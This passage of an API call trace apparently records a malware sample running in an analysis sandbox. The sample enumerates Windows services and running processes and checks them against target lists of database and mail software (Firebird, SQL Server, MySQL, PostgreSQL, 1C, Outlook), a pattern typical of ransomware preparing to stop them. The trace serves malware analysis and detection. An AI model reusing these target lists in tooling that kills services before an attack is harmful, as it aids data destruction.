	[0148.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0148.291] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0148.291] lstrlenW (lpString="DPS") returned 3
	[0148.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0148.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0148.291] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0148.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0148.291] lstrlenW (lpString="eventlog") returned 8
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0148.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0148.292] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0148.292] lstrlenW (lpString="EventSystem") returned 11
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0148.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0148.292] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0148.292] lstrlenW (lpString="gpsvc") returned 5
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0148.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0148.292] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0148.292] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0148.292] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0148.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0148.292] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0148.292] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0148.292] lstrlenW (lpString="lmhosts") returned 7
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0148.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0148.292] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0148.292] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0148.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0148.292] lstrlenW (lpString="MMCSS") returned 5
	[0148.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0148.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0148.293] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0148.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0148.293] lstrlenW (lpString="MpsSvc") returned 6
	[0148.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0148.293] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0148.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0148.293] lstrlenW (lpString="NlaSvc") returned 6
	[0148.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0148.293] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0148.293] lstrlenW (lpString="nsi") returned 3
	[0148.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0148.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0148.293] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0148.293] lstrlenW (lpString="PcaSvc") returned 6
	[0148.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0148.293] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0148.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0148.293] lstrlenW (lpString="PlugPlay") returned 8
	[0148.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0148.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0148.294] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0148.294] lstrlenW (lpString="Power") returned 5
	[0148.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0148.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0148.294] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0148.294] lstrlenW (lpString="ProfSvc") returned 7
	[0148.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0148.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0148.294] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0148.294] lstrlenW (lpString="RpcEptMapper") returned 12
	[0148.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0148.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0148.294] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0148.294] lstrlenW (lpString="RpcSs") returned 5
	[0148.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0148.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0148.294] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0148.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0148.294] lstrlenW (lpString="SamSs") returned 5
	[0148.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0148.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0148.295] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0148.295] lstrlenW (lpString="Schedule") returned 8
	[0148.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0148.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0148.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0148.295] lstrlenW (lpString="SENS") returned 4
	[0148.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0148.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0148.295] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0148.295] lstrlenW (lpString="ShellHWDetection") returned 16
	[0148.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0148.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0148.295] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0148.295] lstrlenW (lpString="Spooler") returned 7
	[0148.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0148.295] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0148.295] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0148.295] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0148.295] lstrlenW (lpString="Themes") returned 6
	[0148.295] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0148.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0148.296] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0148.296] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0148.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0148.296] lstrlenW (lpString="UxSms") returned 5
	[0148.296] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0148.296] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0148.296] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0148.296] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0148.296] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0148.296] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0148.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x38c
	[0148.298] Process32FirstW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0148.298] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0148.298] lstrlenW (lpString="System") returned 6
	[0148.298] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0148.298] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0148.298] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0148.298] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0148.298] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0148.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0148.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0148.299] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0148.299] lstrlenW (lpString="smss.exe") returned 8
	[0148.299] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0148.299] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0148.299] lstrlenW (lpString="csrss.exe") returned 9
	[0148.299] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0148.299] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0148.300] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0148.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0148.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0148.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0148.300] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0148.300] lstrlenW (lpString="wininit.exe") returned 11
	[0148.300] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0148.300] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0148.300] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0148.300] lstrlenW (lpString="csrss.exe") returned 9
	[0148.301] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0148.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0148.301] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0148.301] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0148.301] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0148.301] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0148.301] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0148.301] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0148.301] lstrlenW (lpString="winlogon.exe") returned 12
	[0148.301] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0148.301] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0148.302] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0148.302] lstrlenW (lpString="services.exe") returned 12
	[0148.302] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0148.302] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0148.302] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0148.302] lstrlenW (lpString="lsass.exe") returned 9
	[0148.303] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0148.303] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0148.303] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0148.303] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0148.303] lstrlenW (lpString="lsm.exe") returned 7
	[0148.303] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0148.303] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0148.303] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0148.303] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0148.303] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.304] lstrlenW (lpString="svchost.exe") returned 11
	[0148.304] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0148.304] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.304] lstrlenW (lpString="svchost.exe") returned 11
	[0148.304] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0148.304] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0148.304] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.305] lstrlenW (lpString="svchost.exe") returned 11
	[0148.305] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0148.305] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.305] lstrlenW (lpString="svchost.exe") returned 11
	[0148.305] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0148.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0148.305] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.306] lstrlenW (lpString="svchost.exe") returned 11
	[0148.306] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0148.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0148.306] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0148.306] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0148.306] lstrlenW (lpString="audiodg.exe") returned 11
	[0148.306] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.307] lstrlenW (lpString="svchost.exe") returned 11
	[0148.307] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.307] lstrlenW (lpString="svchost.exe") returned 11
	[0148.307] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0148.307] lstrlenW (lpString="spoolsv.exe") returned 11
	[0148.307] Process32NextW (in: hSnapshot=0x38c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0148.308] lstrlenW (lpString="svchost.exe") returned 11
